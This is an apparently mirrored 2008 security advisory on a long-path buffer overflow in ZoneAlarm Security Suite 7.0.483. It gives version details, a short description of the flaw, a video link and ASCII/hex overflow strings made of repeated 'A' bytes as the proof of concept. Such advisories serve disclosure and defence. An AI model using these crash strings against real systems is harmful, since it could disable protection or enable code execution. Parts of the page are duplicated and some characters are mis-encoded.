ZoneAlarm Security Suite buffer overflow

2008-09-1300:00:00

vulners.com

JSON

Application: ZoneAlarm Security Suite
OS: Windows Xp (All patches a day)

1 - Description
2 - Vulnerability
3 - POC/EXPLOIT

Description

The zonealarm is a known firewall,
which in the version "security suite" brings some tools as an antivirus, antispam and so on.

Details of the version

ZoneAlarm Security Suite versiуn:7.0.483.000
Versiуn de TrueVector:7.0.483.000
Versiуn del controlador:7.0.483.000
Versiуn de motor anti-virus:3
Versiуn de motor antivirus:5.0.1.85
Versiуn de archivo DAT de firma de anti-virus 915051681
Versiуn de motor de protecciуn contra programas espнa:5.0.189.0
Versiуn de archivo DAT de firma de protecciуn contra programas espнa 01.200801.3195
Versiуn de AntiSpam 5.0.6.8903

Vulnerability

The vulnerability is caused because the program can not analyze very long paths.
This causes a buffer overflow with the possibility of execution of code.

The flaw could be exploited by malware to leave without protection to the system for instance.

POC/EXPLOIT

Here you can view a video proof of concept

http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf

Strings

ASCII: · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … AAAAAAAAAAAAAAAAAAA · …
AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … A · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA

HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85
20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7
20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41

ASCII:
……………………………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41

Juan Pablo Lopez Yacubian

JSON

ZoneAlarm Security Suite buffer overflow

Application: ZoneAlarm Security Suite OS: Windows Xp (All patches a day)

1 - Description 2 - Vulnerability 3 - POC/EXPLOIT

Application: ZoneAlarm Security Suite
OS: Windows Xp (All patches a day)

1 - Description
2 - Vulnerability
3 - POC/EXPLOIT